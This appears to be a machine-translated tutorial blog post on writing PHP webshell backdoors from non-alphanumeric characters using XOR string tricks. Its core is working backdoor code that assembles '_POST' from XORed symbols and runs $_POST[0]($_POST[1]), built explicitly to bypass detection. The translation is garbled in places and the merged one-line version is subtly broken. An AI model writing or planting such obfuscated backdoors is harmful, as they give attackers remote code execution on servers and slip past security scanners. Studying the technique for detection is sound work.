Write abnormal PHP backdoors (non-alphanumeric)

In this article, I will show you how to write a PHP backdoor with non-alphanumeric characters. When writing such PHP backdoors, we first need to understand some basic knowledge: (1) Understanding PHP (2) to understand curl or other tools that can operate HTTP requests, you need to understand the concept of PHP exception or (^. Everyone knows about the difference or, but there may not be many places that can be used normally. At the very least, I don't usually use it (don't spray it ). Here, we emphasize the concept of exclusive or exclusive because exclusive or exclusive PHP webshells are frequently used and very important. Let's take a look at the following code:

<?php    echo "A" ^ "}";?>

 

When you run this code, the output result is the character "<". The reason for this is that the characters "A" and "}" are operated differently in the code. In PHP, when two variables are exclusive or, the string will be converted to binary, then the XOR, exclusive or complete, and the result will be converted from binary to string. An exception or operation is sometimes used to exchange values of two variables. We all know that PHP is a weak language, that is, in PHP, we can directly declare a variable and perform initialization or value assignment without declaring the variable type in advance. Due to the weak PHP type, we implicitly convert the PHP type and use this feature to perform some Unconventional Operations. For example, if you convert an integer to a string type, use a Boolean value as an integer type, or use a string as a function, let's look at a piece of code:

<?php    $_++;    $__="<"^"}";    $__("stuff");?>

 

You may be confused when you see this code. I will explain it briefly below: (1) $ _ ++; this line of code indicates the auto-increment operation on the variable named "_". The default value of the variable undefined in PHP is null, null = false = 0, we can use the auto-increment operation on undefined variables to get a number without using any number. (2) $ __= "<" ^ "}"; returns an exclusive or operation on the characters "<" and, the result is as follows: A is assigned to the variable named "_" (two underscores) (3) $ __( "stuff, the value of the variable $ __is A, so this line can be considered as A ("stuff"). in PHP, this line of code indicates that function A is called, but since function A is not defined in the program, therefore, this line of code throws a fatal error to stop the program. This line of code has no practical significance, but it can be simply reflected in PHP. We can treat strings as functions. This article will not be so confusing if you see a PHP webshell like this again. You can use the webshell code to understand the function that the webshell wants to implement. If you are still confused, it means that this cainiao's article is not well written. Sorry, but I still hope you will not scold me. The sample code above will eventually go wrong, causing the program to stop running. Of course, writing an erroneous program is not our goal, the main purpose of this backdoor is to create some strings that can bypass detection and are useful to us, such as _ POST "," system "," call_user_func_array ", or anything we need. Below is a very simple PHP backdoor with non-alphanumeric characters:

<?php    @$_++; // $_ = 1    $__=("#"^"|"); // $__ = _    $__.=("."^"~"); // _P    $__.=("/"^"`"); // _PO    $__.=("|"^"/"); // _POS    $__.=("{"^"/"); // _POST     ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);?>

 

We can even merge the above Code into one line to make the program more readable. The Code is as follows: $ __= ("#" ^ "| "). (". "^ "~ "). ("/" ^ "'"). ("|" ^ "/"). ("{" ^ "/"); Analyze the code according to the first explanation in the article. We know that this is a PHP backdoor that can call functions. I hope this article will help you. Last, no last!